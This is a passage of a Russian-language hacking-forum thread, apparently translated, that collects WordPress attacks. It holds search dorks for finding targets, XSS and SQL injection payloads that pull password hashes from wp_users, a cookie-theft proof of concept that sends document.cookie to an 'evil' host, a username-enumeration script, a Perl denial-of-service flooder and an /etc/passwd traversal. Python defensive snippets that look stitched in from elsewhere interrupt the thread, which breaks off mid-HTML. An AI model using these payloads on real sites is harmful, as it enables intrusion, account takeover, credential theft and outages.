[ WordPress vulnerability overview ]

Discussion in the "Scripts/CMF/CMS" section, started by ettee, 5.10.2007.

  1. ettee (Administrator)

    Vulnerabilities:

    Wordpress Multiple Versions Pwnpress Exploitation Tookit (0.2pub)

    Wordpress plugin myflash <= 1.00 (wppath) RFI Vulnerability

    Enigma 2 WordPress Bridge (boarddir) Remote File Include Vulnerability

    1.4*
    Wordpress plugin wordTube <= 1.43 (wpPATH) RFI Vulnerability

    Wordpress plugin wp-Table <= 1.43 (inc_dir) RFI Vulnerability

    Wordpress Plugin myGallery <= 1.4b4 Remote File Inclusion Vulnerability


    1.5.1.*
    Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit)

    Wordpress <= 1.5.1.3 Remote Code Execution 0-Day Exploit

    Wordpress <= 1.5.1.2 xmlrpc Interface SQL Injection Exploit

    WordPress <= 1.5.1.1 SQL Injection Exploit

    WordPress <= 1.5.1.1 "add new admin" SQL Injection Exploit

    2.0.*
    WordPress <= 2.0.2 (cache) Remote Shell Injection Exploit

    Wordpress <= 2.0.6 wp-trackback.php Remote SQL Injection Exploit

    Wordpress 2.0.5 Trackback UTF-7 Remote SQL Injection Exploit

    2.1.*
    Wordpress 2.1.2 (xmlrpc) Remote SQL Injection Exploit

    Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit

    2.*
    Wordpress <= 2.x dictionnary & Bruteforce attack

    WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit

    Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit


    dork:
    Code:
    "is proudly powered by WordPress"
    intext:"Warning: main" inurl:Wp ext:php
    inurl:wp-login.php Register Username Password -echo -trac
    inurl:"wp-admin" config -cvs -phpxref
    inurl:/comments/feed/rss2/ intext:wordpress.org?v=*
    Powered by Wordpress 1.2
    intext:"proudly powered by WordPress" filetype:php
    intext:"powered by WordPress" filetype:php -dritte-seite
    intitle:"WordPress > * > Login form" inurl:"wp-login.php" 
    ext:php inurl:"wp-login.php" -cvs

    Full path disclosure:


    WordPress < 1.5.2

    Cross-site Scripting:
    /wp-login.php?action=login&redirect_to=[XSS]
    /wp-admin/templates.php?file=[XSS]
    /wp-admin/post.php?content=[XSS]
    http://www.example.com/wp-admin/edit-comments.php?s=[XSS]
    http://www.example.com/wp-admin/edit-comments.php?s=bla&submit=Search&mode=[XSS]
    http://www.example.com/wp-admin/templates.php?file=[XSS]
    http://www.example.com/wp-admin/link-add.php?linkurl=[XSS]
    http://www.example.com/wp-admin/link-add.php?name=[XSS]
    http://www.example.com/wp-admin/link-categories.php?cat_id=[XSS]&action=Edit
    http://www.example.com/wp-admin/link-manager.php?order_by=[XSS]
    http://www.example.com/wp-admin/link-manager.php?cat_id=[XSS]
    http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_url=[XSS]
    http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_name=[XSS]
    http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_description=[XSS]
    http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rel=[XSS]
    http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_image=[XSS]
    http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rss_uri=[XSS]
    http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_notes=[XSS]
    http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_id=[XSS]
    http://www.example.com/wp-admin/link-manager.php?action=linkedit&order_by=[XSS]
    http://www.example.com/wp-admin/link-manager.php?action=linkedit&cat_id=[XSS]
    http://www.example.com/wp-admin/post.php?content=[XSS]
    http://www.example.com/wp-admin/moderation.php?action=update&item_approved=[XSS]

    SQL injection examples:
    http://www.example.com/index.php?m=[SQL]
    http://www.example.com/wp-admin/edit.php?m=[SQL]
    http://www.example.com/wp-admin/link-categories.php?cat_id=[SQL]&action=Edit
    http://www.example.com/index.php?cat=100)%09or%090=0%09or%09(0=1

    Tables/Prefix_/Columns:
    wp_

    Hash algorithms:
    md5(password)

    WordPress Vulnerability Scanner
    Code:
    $ perl -x wp-scanner.pl http://testblog/wordpress/
    
    WordPress Scanner starting: David Kierznowski (http://michaeldaw.org)
    
    Using plugins dir: wp-content/plugins
    
    [*] Initial WordPress Enumeration
    [*] Finding WordPress Major Version
    [*] Testing WordPress Template for XSS
    
    WordPress Basic Results
    
            wp-commentsrss2.php =>  Version Leak: WordPress 2.1.3
            wp-links-opml.php =>    Version Leak: WordPress 2.1.3
            wp-major-ver => Version 2.1
            wp-rdf.php =>   Version Leak: WordPress 2.1.3
            wp-rss.php =>   Version Leak: WordPress 2.1.3
            wp-rss2.php =>  Version Leak: WordPress 2.1.3
            wp-server =>    Apache/1.3.34 (Unix) PHP/4.4.4 mod_ssl/2.8.25 OpenSSL/0.9.8a
            wp-style-dir => http://testblog/wordpress/wp-content/themes/time1-theme-10/style.css
            wp-title => Test Blog
            wp-version =>   WordPress 2.1.3
            x-Pingback =>   http://testblog/wordpress/xmlrpc.php
    
    WordPress Plugins Found
    
            wp-plugins[0]    => Akismet
    
    Download
     
    #1 ettee, 5.10.2007
    Last edited: 10.12.2007
  2. +toxa+

    WordPress Scanner v1.3b BETA

    http://blogsecurity.net/cgi-bin/wp-scanner.cgi
    http://blogsecurity.net/projects/wp-scanner.zip
     
    #2 +toxa+, 5.10.2007
    Last edited: 5.10.2007
  3. +toxa+

    WordPress <=2.0.4 XSS

    simple PoC:
    HTML:
    <html>
    <head></head>
    <body>
    
    <form method="post" action="http://target/wordpress/wp-register.php" >
    <input type="hidden" name="action" value="register" />
    <input type="hidden" name="user_login" id="user_login"
    value='"><script>alert(1)</script>' />
    <input type="hidden" name="user_email" id="user_email"
    value='"><script>alert(2)</script>' />
    </form>
    <script>document.forms[0].submit()</script>
    </body>
    </html>
    cookie theft PoC:

    HTML:
    <html>
    <head></head>
    <body>
    
    <form method="post"
    action="http://target/wordpress/wp-register.php#location='http://evil/?'+document.cookie"
    >
    <input type="hidden" name="action" value="register" />
    <input type="hidden" name="user_login" id="user_login" value="anyusername" />
    <input type="hidden" name="user_email" id="user_email"
    value='"><script>eval(location.hash.substr(1))</script>' />
    
    </form>
    <script>document.forms[0].submit()</script>
    </body>
    </html>
    unrestricted script insertion from a third-party site (we prove we can inject ANY JS):

    HTML:
    <html>
    <head></head>
    <body>
    
    <form method="post" action="http://victim/wordpress/wp-register.php" >
    <input type="hidden" name="action" value="register" />
    <input type="hidden" name="user_login" id="user_login" value="test" />
    <input type="hidden" name="user_email" id="user_email"
    value='"><SCRIPT src=http://evil/jsfile></SCRIPT>'>
    </form>
    <script>document.forms[0].submit()</script>
    </body>
    </html>
     
  4. Solide Snake

    07 June 2007
    Program: WordPress 2.2, possibly earlier versions

    Severity: Medium

    Exploit available: Yes

    Description:
    The vulnerability allows a remote user to execute arbitrary SQL commands in the application's database.

    The vulnerability exists because of insufficient validation of input data in the "wp.suggestCategories" method of the xmlrpc.php script. By sending a specially crafted request, a remote user can execute arbitrary SQL commands in the application's database.

    For this to work, user registration must be enabled on the site; the request is sent as POST only.
    Here is an example request:
    HTML:
    <methodCall>
    <methodName>wp.suggestCategories</methodName>
    <params>
    <param><value>1</value></param>
    <param><value>[login here]</value></param>
    <param><value>[password here]</value></param>
    <param><value>1</value></param>
    <param><value>0 UNION SELECT USER()</value></param>
    </params>
    </methodCall>
     
    #4 Solide Snake, 5.10.2007
    Last edited by a moderator: 20.05.2008
  5. +toxa+

    Wordpress 2.2 Username Enumeration

    Code:
    #!/bin/bash

    # this script attacks a low-risk username enumeration vul
    # on Wordpress 2.2 login page. Previous versions are
    # possibly affected as well
    #
    # Note: you need curl [http://curl.haxx.se/download.html]
    # installed on your system for this script to work.
    #
    # Adrian Pastor - http://www.gnucitizen.org/

    if [ $# -ne 2 ]
    then
        echo "need two parameters! correct syntax is:"
        echo "$0 <ip-or-hostname> <wordlist-filename>"
        exit 1
    fi

    for U in `cat $2`
    do
        #echo $U

        if curl -d "log=$U&pwd=mypassword&wp-submit=Login+%C2%BB&redirect_to=" --url "http://$1/wordpress/wp-login.php" | grep 'Incorrect password' > /dev/null
        then
            echo "username found!: $U"   # print username found on screen
            echo $U >> $0.found          # save results to a file named after the script plus a .found extension
        fi
    done
     
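A defender-side counterpart to the script above, added here as an example (it is not part of the post): a detector that reads Apache combined-format access log lines and flags a source IP that POSTs to wp-login.php at least a threshold number of times inside a short sliding window, which is the traffic shape a wordlist-driven enumeration run produces. The log lines, IP addresses and timestamps below are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache combined log format: ip ident user [ts] "METHOD path proto" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],   # drop the query string
        "status": int(m.group("status")),
    }


def find_login_bursts(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {ip: start_of_burst} for each IP that POSTs to wp-login.php at least
    `threshold` times inside any `window`-long interval (sliding window per IP)."""
    recent = defaultdict(deque)   # ip -> timestamps of its recent login POSTs
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or not rec["path"].endswith("/wp-login.php"):
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while q and rec["ts"] - q[0] > window:   # expire entries that fell out of the window
            q.popleft()
        if len(q) >= threshold and rec["ip"] not in flagged:
            flagged[rec["ip"]] = q[0]
    return flagged


# ---- constructed sample traffic (not real data) ----
def _line(ip, ts, method="POST", path="/wordpress/wp-login.php", status=200, size=1742):
    stamp = ts.strftime("%d/%b/%Y:%H:%M:%S") + " +0000"
    return f'{ip} - - [{stamp}] "{method} {path} HTTP/1.1" {status} {size} "-" "curl/7.16.0"'


T0 = datetime(2007, 10, 5, 14, 3, 0)
SAMPLE_LOG = (
    [_line("203.0.113.5", T0 + timedelta(seconds=i)) for i in range(12)]        # one wordlist run
    + [_line("198.51.100.7", T0 + timedelta(seconds=30 * i)) for i in range(3)]  # a person retrying
    + [_line("198.51.100.7", T0, method="GET")]                                 # page load, ignored
)

if __name__ == "__main__":
    for ip, start in find_login_bursts(SAMPLE_LOG).items():
        print(f"{ip}: login POST burst starting {start:%H:%M:%S}")
```

Pair the detector with a login handler that returns one identical message for an unknown user and a wrong password, which removes the "Incorrect password" signal the script keys on.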
  6. +toxa+

    WordPress Security Whitepaper

    http://blogsecurity.net/projects/secure-wp-whitepaper.pdf

    &&

    Writing Secure WordPress Plugins
    http://michaeldaw.org/papers/securing_wp_plugins/
     
    #6 +toxa+, 5.10.2007
    Last edited: 5.10.2007
  7. ettee (Administrator)

    WordPress PHP_Self Cross-Site Scripting Vulnerability
    Code:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
            "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">	
    <head>
    	<title>Wordpress XSS PoC</title>
    </head>
    <body id="main">
    
    	<form action="http://localhost/wp/wp-admin/theme-editor.php/'><img src=a onerror=document.forms[0].submit()><.php" method="post">
    		<p>
    			<textarea name="newcontent" rows="8" cols="40">&lt;?php echo "Owned! " . date('F d, Y'); ?&gt;</textarea>
    		</p>
    		<p>
    			<input type="hidden" name="action" value="update" />
    			<input type="hidden" name="file" value="wp-content/themes/default/index.php" />		
    		</p>
    	</form>	
    	<script type="text/javascript">
    	// <![CDATA[
    		document.forms[0].submit();
    	// ]]>
    	</script>
    </body>
    </html>
    
    Vulnerable URI:
    Code:
    /wp-admin/plugins.php?page=akismet-key-config
    Vulnerable Post variable:
    Code:
    _wp_http_referer="'%2522><script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))</script>"
    by 0x000000
     
    #7 ettee, 5.10.2007
    Last edited: 10.12.2007
  9. Solide Snake

    Password brute-forcing for WordPress 2.x in Python: here.

  10. ettee (Administrator)

    runPHP Plugin
    /wp-admin/post.php?action=edit&post=1/*SQLINJECTION*/%20AND%201′=0


    WP <2.3
    http://target/wp-admin/edit-post-rows.php?posts_columns[]=<script>alert(1)</script>


    WordPress 2.0.1 Remote DoS Exploit
    Code:
    #!perl 
    #Greets to all omega-team members + h4cky0u[h4cky0u.org], lessMX6 and all dudes from #DevilDev ;)
    #The exploit was tested on 10 machines but not all got flooded.Only 6/10 got crashed 
    use Socket;
    if (@ARGV < 2) { &usage; }
    $rand=rand(10); 
    $host = $ARGV[0];
    $dir = $ARGV[1]; 
    $host =~ s/(http:\/\/)//eg; #no http://
    for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++) #0_o :)
    { 
    $user="\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x66\x6f\x6f".$rand.$i; #you N33d t0 be l33t t0 s33 th!S ! 
    $data = "action=register&user_login=$user&user_email=$user\@matrix.org&submit=Register+%C2%BB";
    $len = length $data; 
    $foo = "POST   ".$dir."wp-register.php HTTP/1.1\r\n". 
                   "Accept: */*\r\n".
                   "Accept-Language: en-gb\r\n".
                   "Content-Type: application/x-www-form-urlencoded\r\n".
                   "Accept-Encoding: gzip, deflate\r\n". 
                   "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
                   "Host: $host\r\n".
                   "Content-Length: $len\r\n".
                   "Connection: Keep-Alive\r\n". 
                   "Cache-Control: no-cache\r\n\r\n".
     "$data";
         my $port = "80";
         my $proto = getprotobyname('tcp');
         socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
         connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
         send(SOCKET,"$foo", 0); 
         syswrite STDOUT, "+"; 
    } 
    #s33 if the server is down
    print "\n\n";
    system('ping $host');
    sub usage {
    print "\n\t(W)ordpress 2.0.1 (R)emote (D)oS (E)xploit (B)y matrix_killer\n";
    print "\te-mail: matrix_k\@abv.bg\n";
    print "\tusage: \n";
    print "\t$0 <host> </dir/>\n"; 
    print "\tex: $0 127.0.0.1 /wordpress/\n";
    print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n";
    exit();
    };
    
     
    #10 ettee, 6.10.2007
    Last edited by a moderator: 24.01.2008
  11. The_HuliGun

    Path disclosure
    Code:
    http://[target]/[path]/wp-content/plugins/akismet/akismet.php
    
     
  13. Fugitif

    WordPress Plugin BackUpWordPress <= 0.4.2b RFI Vulnerability

    Code:
    #Author: S.W.A.T.
    
    
    #cont@ct: svvateam@yahoo.com
    
    --------------------------------------------------------------------------------
    
    
    ------------------------- -------------------------------------------------------
    
    Application :  BackUpWordPress 0.4.2b
    
    Download    :  http://wordpress.designpraxis.at/download/backupwordpress.zip
    
    --------------------------------------------------------------------------------
    Vuln :
    
    require_once $GLOBALS['bkpwp_plugin_path']."PEAR.php";
    
    --------------------------------------------------------------------------------
    
    Exploit:
    
    http://[target]/_path]/plugins/BackUp/Archive.php?bkpwp_plugin_path=Shl3?
    
    http://[target]/_path]/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=Shl3?
    
    http://[target]/_path]/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=Shl3?
    
    http://[target]/_path]/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=Shl3?
    
    & other Files & Folders In The [Archive] Folder
    
    --------------------------------------------------------------------------------
    
    Dork:
    
    "inurl:/plugins/BackUp"
    

    Mirror:

    http://www.milw0rm.com/exploits/4593
     
  14. Fugitif

    Sql Injection in wordpress 2.3.1

    Code:
    Author : Beenu Arora
    
    Mail : beenudel1986 (at) gmail (dot) com [email concealed]
    
    Application : WordPress (2.3.1)
    
    Homepage: http://wordpress.org/
    
    ~~~~~~~~~~~~~~~~~~SQL Injection ~~~~~~~~~~~~
    
    Vulnerable URL : http://localhost/path_to_wordpress/?feed=rss2&p=
    
    Parameter : P
    
    POC = http://localhost/path_to_wordpress/?feed=rss2&p=11/**/union/**/select/**
    /concat(user_password,char(100),username),2/**/from/**/wp_users/**/where
    /**/user_id=1/*

    Code:
    http://www.securityfocus.com/archive/1/484608
     
  16. Fugitif

    WordPress Charset SQL Injection Vulnerability

    Insufficient filtering when the database uses the GBK charset leads to SQL injection.
    ( Article describing the vulnerability on Antichat: https://forum.antichat.ru/thread62109.html )


    Exploit:
    http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23

    _http://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html

    Code:
    === WordPress Charset SQL Injection Vulnerability ===
    
    Release date: 2007-12-10
    Last modified: 2007-12-10
    Source: Abel Cheung
    Affected version: WordPress escape($gpc);
    }
    
    
      Finally, escape() method belongs to wp-includes/wp-db.php:
    
    function escape($string) {
      return addslashes( $string ); // Disable rest for now, causing problems
      ......
    }
    
    
    3. Proof of concept
    
      a. After WordPress installation, modify wp-config.php to make sure
         it uses certain character set for database connection (Big5 can
    also be used):
         define('DB_CHARSET', 'GBK');
    
      b. http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23
    
    
    4. Workaround
    
      Note: This vulnerability only exists for database queries performed
      using certain character sets. For databases created in most other
      character sets no remedy is needed.
    
      a. It is recommended to convert WordPress database to use character sets not
         vulnerable to such SQL exploit. One such charset is UTF-8, which does not
         use backslash ('\') as part of character and it supports various languages.
      b. Alternatively, edit WordPress theme to remove search capability.
    
    
     
    #16 Fugitif, 11.12.2007
    Last edited by a moderator: 2.05.2008
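The mechanism behind the advisory above, worked through as an added example (this is not the advisory's or WordPress's code): a byte-wise model of PHP's addslashes() shows why its backslash is swallowed into a GBK multibyte character, and a charset-aware escape shows the property that mysql_real_escape_string() or prepared statements provide. The payload is constructed from the %b3%27 prefix in the PoC URL; the SQL fragment is a simplified stand-in for the search clause.

```python
from typing import Optional


def addslashes(data: bytes) -> bytes:
    """Byte-wise model of PHP addslashes(): a backslash before ' " \\ and NUL."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def unescaped_quotes_seen_by_gbk_server(raw: bytes) -> int:
    """How many single quotes survive as string delimiters once the escaped bytes
    are decoded as GBK, which is what MySQL does on a GBK connection.

    0x5C (backslash) is a legal GBK trail byte. When the input starts with a lead
    byte such as 0xB3, the server glues 0xB3 0x5C into one CJK character and the
    0x27 that follows is left as a bare quote: the escaping has been eaten."""
    text = addslashes(raw).decode("gbk")
    return sum(1 for i, ch in enumerate(text)
               if ch == "'" and (i == 0 or text[i - 1] != "\\"))


def escape_gbk_aware(raw: bytes) -> Optional[bytes]:
    """Charset-aware alternative: validate the multibyte input first, then escape
    per character and re-encode. An orphan lead byte (0xB3 followed by 0x27 is
    not a valid GBK pair) is rejected instead of being escaped byte by byte."""
    try:
        text = raw.decode("gbk")
    except UnicodeDecodeError:
        return None
    return text.replace("\\", "\\\\").replace("'", "\\'").encode("gbk")


def build_search_fragment(raw: bytes, escape) -> Optional[bytes]:
    """Constructed, simplified stand-in for the search clause the PoC targets."""
    escaped = escape(raw)
    if escaped is None:
        return None
    return b"... AND (post_title LIKE '%" + escaped + b"%') ..."


# Constructed input shaped like the PoC: the %b3%27 prefix followed by SQL.
PAYLOAD = b"\xb3')))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3"

if __name__ == "__main__":
    print(unescaped_quotes_seen_by_gbk_server(PAYLOAD))               # 1: the quote breaks out
    print(unescaped_quotes_seen_by_gbk_server("abc'".encode("gbk")))  # 0: plain ASCII is fine
    print(escape_gbk_aware(PAYLOAD))                                  # None: malformed input rejected
    print(build_search_fragment("中文'".encode("gbk"), escape_gbk_aware))
```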
  17. Fugitif

    Wordpress 2.3.1 - Broken Access Control is_admin()

    Obtaining admin privileges while bypassing the password.

    How to use it: _http://forum.antichat.ru/showpost.php?p=729009&postcount=63

    Code:
    By Michael Brooks
    
    Vulnerability:Broken Access Control
    
    Homepage:http://wordpress.org/download
    
    Software: Wordpress
    
    Version affected:2.3.1 (Latest at the time of writing)
    
    
    
    The impact of the flaw is that an attacker can read posts while they are still drafts. This is an ability that only the administrator should have. Imagine a stranger being able to read the news before it is published. Or perhaps a spam-blog harvesting posts before they are published.
    
    
    
    This flaw is because Wordpress is trusting the $_SERVER['REQUEST_URI'] global variable. Manipulation of $_SERVER['REQUEST_URI'] has led to many xss flaws. Although an attacker shouldn't be able to control all $_SERVER variables, none of them should be trusted.
    
    
    
    exploit:
    
    htttp://localhost/wordpress/'wp-admin/
    
    
    This will cause both $_SERVER['REQUEST_URI'] and $_SERVER['PHP_SELF'] to contain the value:
    htttp://localhost/wordpress/'wp-admin/
    
    
    Vulnerable function:
    
    line 34, in ./wp-includes/query.php.
    
    function is_admin () {
        global $wp_query;
        return ($wp_query->is_admin || (stripos($_SERVER['REQUEST_URI'], 'wp-admin/') !== false));
    }
    
    The same flaw is duplicated again on line 645 of the same file.
    
    
    
    This url: htttp://localhost/wordpress/'wp-admin/
    will cause the is_admin() function to return true. This flaw works regardless of register_globals or magic_quotes_gpc. The attack fails when search engine friendly urls are turned on in wordpress, however this option is turned off by default. Turning search engine friendly urls on is a workaround until a patch is created.
     
    #17 Fugitif, 16.12.2007
    Last edited by a moderator: 13.06.2008
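The access-control check discussed above, re-implemented as an added example (not WordPress code): the substring search over REQUEST_URI from the advisory beside a hardened decision that uses only state the server controls, a flag set by the admin entry script (the role WordPress later gave the WP_ADMIN constant) and the normalized SCRIPT_NAME. The install prefix /wordpress/ and the request paths are assumptions.

```python
import posixpath
import re

ADMIN_PREFIX = "/wordpress/wp-admin/"   # assumption: the blog lives under /wordpress/


def is_admin_by_request_uri(request_uri: str) -> bool:
    """Model of the 2.3.1 check: a case-insensitive substring search over the raw
    request line, query string included. Any client-supplied text containing
    'wp-admin/' passes, which is why /wordpress/'wp-admin/ works."""
    return "wp-admin/" in request_uri.lower()


def is_admin_hardened(entry_point_is_admin: bool, script_name: str,
                      admin_prefix: str = ADMIN_PREFIX) -> bool:
    """Decide from state the server controls, never from the request line.

    entry_point_is_admin: flag an admin entry script sets when it loads.
    script_name: SCRIPT_NAME, the path of the file the web server actually ran,
    normalized so '..' segments and doubled slashes cannot fake the prefix."""
    if entry_point_is_admin:
        return True
    path = posixpath.normpath(re.sub(r"/+", "/", script_name))
    return path == admin_prefix.rstrip("/") or path.startswith(admin_prefix)


if __name__ == "__main__":
    # Constructed requests: the advisory's URL reaches the front-end index.php,
    # yet the substring check treats it as an admin page.
    print(is_admin_by_request_uri("/wordpress/'wp-admin/"))          # True (flaw)
    print(is_admin_hardened(False, "/wordpress/index.php"))          # False
    print(is_admin_hardened(False, "/wordpress/wp-admin/post.php"))  # True
```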
  18. +toxa+

    Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability

    Code:
    Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability
    D.Script : http://downloads.wordpress.org/plugin/pictpress.release-0.91.zip
    Vuln Code :
    In Line 5,6,7,8 :
        $path = $_GET['path'];
        $size = $_GET['size'];
        $base = dirname(__FILE__) . "/..";
        $cache = "$base/cache/$size/$path";
    In Line 22 :
        readfile($cache);
    POC :
        /wp-content/plugins/pictpress/resize.php?size=../../../../../../../../../../&path=/etc/passwd%00
    
    # milw0rm.com [2007-12-05]
     
  19. +toxa+

    XSS in WP-ContactForm <= 2.0.7

    For attacking admin only (at options page):

    1
    HTML:
    <html>
    <head>
    <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
    </head>
    <!-- <body onLoad="document.hack.submit()"> -->
    <body>
    <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
    <input type="hidden" name="stage" value="process" />
    <input type="hidden" name="wpcf_email" value='"><script>alert(document.cookie)</script>' />
    </form>
    </body>
    </html>
    
    2
    HTML:
    <html>
    <head>
    <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
    </head>
    <!-- <body onLoad="document.hack.submit()"> -->
    <body>
    <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
    <input type="hidden" name="stage" value="process" />
    <input type="hidden" name="wpcf_subject" value='"><script>alert(document.cookie)</script>' />
    </form>
    </body>
    </html>
    
    3
    HTML:
    <html>
    <head>
    <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
    </head>
    <!-- <body onLoad="document.hack.submit()"> -->
    <body>
    <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
    <input type="hidden" name="stage" value="process" />
    <input type="hidden" name="wpcf_question" value='"><script>alert(document.cookie)</script>' />
    </form>
    </body>
    </html>
    
    4
    HTML:
    <html>
    <head>
    <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
    </head>
    <!-- <body onLoad="document.hack.submit()"> -->
    <body>
    <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
    <input type="hidden" name="stage" value="process" />
    <input type="hidden" name="wpcf_answer" value='"><script>alert(document.cookie)</script>' />
    </form>
    </body>
    </html>
    
    =====
    For attacking every user of the site (at contact page):

    5
    HTML:
    <html>
    <head>
    <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
    </head>
    <!-- <body onLoad="document.hack.submit()"> -->
    <body>
    <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
    <input type="hidden" name="stage" value="process" />
    <input type="hidden" name="wpcf_question" value="<script>alert(document.cookie)</script>" />
    </form>
    </body>
    </html>
    
    HTML:
    <html>
    <head>
    <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
    </head>
    <body>
    <iframe src="http://site/contact/" width="0" height="0"></iframe>
    </body>
    </html>
    
    ======
    For attacking every user of the site at contact page (and admin at options page):

    6
    HTML:
    <html>
    <head>
    <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
    </head>
    <!-- <body onLoad="document.hack.submit()"> -->
    <body>
    <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
    <input type="hidden" name="stage" value="process" />
    <input type="hidden" name="wpcf_success_msg" value="</textarea><script>alert(document.cookie)</script>" />
    </form>
    </body>
    </html>
    
    7
    HTML:
    <html>
    <head>
    <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
    </head>
    <!-- <body onLoad="document.hack.submit()"> -->
    <body>
    <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
    <input type="hidden" name="stage" value="process" />
    <input type="hidden" name="wpcf_error_msg" value="</textarea><script>alert(document.cookie)</script>" />
    </form>
    </body>
    </html>
    
    ======
    For attacking every user of the site (at contact page):

    8
    HTML:
    <html>
    <head>
    <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
    </head>
    <!-- <body onLoad="document.hack.submit()"> -->
    <body>
    <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
    <input type="hidden" name="stage" value="process" />
    <input type="hidden" name="wpcf_answer" value="4" />
    <input type="hidden" name="wpcf_success_msg" value="<script>alert(document.cookie)</script>" />
    </form>
    </body>
    </html>
    
    HTML:
    <html>
    <head>
    <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
    </head>
    <!-- <body onLoad="document.hack.submit()"> -->
    <body>
    <form name="hack" action="http://site/contact/" method="post">
    <input type="hidden" name="wpcf_stage" value="process" />
    <input type="hidden" name="wpcf_your_name" value="test" />
    <input type="hidden" name="wpcf_email" value="test@test.test" />
    <input type="hidden" name="wpcf_response" value="4" />
    <input type="hidden" name="wpcf_msg" value="XSS" />
    </form>
    </body>
    </html>
    
    9
    HTML:
    <html>
    <head>
    <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
    </head>
    <!-- <body onLoad="document.hack.submit()"> -->
    <body>
    <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
    <input type="hidden" name="stage" value="process" />
    <input type="hidden" name="wpcf_error_msg" value="<script>alert(document.cookie)</script>" />
    </form>
    </body>
    </html>
    
    HTML:
    <html>
    <head>
    <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
    </head>
    <!-- <body onLoad="document.hack.submit()"> -->
    <body>
    <form name="hack" action="http://site/contact/" method="post">
